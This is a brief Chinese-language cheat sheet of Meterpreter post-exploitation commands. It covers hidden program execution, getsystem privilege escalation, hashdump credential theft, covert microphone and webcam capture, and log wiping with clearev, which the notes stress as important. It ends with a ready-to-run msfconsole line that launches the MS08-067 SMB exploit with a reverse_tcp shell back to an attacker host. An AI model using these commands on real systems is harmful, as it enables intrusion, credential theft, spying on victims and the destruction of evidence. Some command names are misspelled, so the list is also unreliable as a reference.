meterpreter
高级、动态、可扩展的Payload
基础命令
help
background
cd
dir / ls
cat
mkdir
rmdir
mv
rm
edit #编辑目标文件
lpwd #显示本地目录
lcd #进入本地目录
download #下载到lpwd目录
upload #上传
execute -f cmd.exe -i -H #执行程序
进阶命令
run #调用大量模块进行控制(前台)
bgrun #调用大量模块进行控制(后台)
download #下载到lpwd目录
upload #上传
execute -f cmd.exe -i -H #执行程序,-f指定文件,-i交互,-H隐藏
geiuid #查看账号
getsystem #强制获取system权限
getprive #查看权限
getproxy #获取代理信息
getpid #查看自身进程pid
migrate #迁移进程
hashdump #获取hashdump
sysinfo #获取系统信息
ps #获取进程信息
kill #kil进程
show_mount #查看分区信息
reboot #重启
shutdown #关机
shell #获取操作系统shell
search -f #搜索文件
arp #查看arp信息
netstat #查看网络连接情况
ipconfig \ ifconfig #查看IP地址
route #路由表
idletime #目标操作系统空闲时间
resource #调用资源文件
record_mic #mic录音
webcam_list #列出摄像头
webcam_snap -i 1 -v false #每隔1秒拍照
load python #扩展python
clearev #清除日志!!!重要
msfcli
2015年6月已经取消
msfconsole -x
示例
msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST 1.1.1.1; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 1.1.1.8; set LPORT 5555; set target 34;exploit"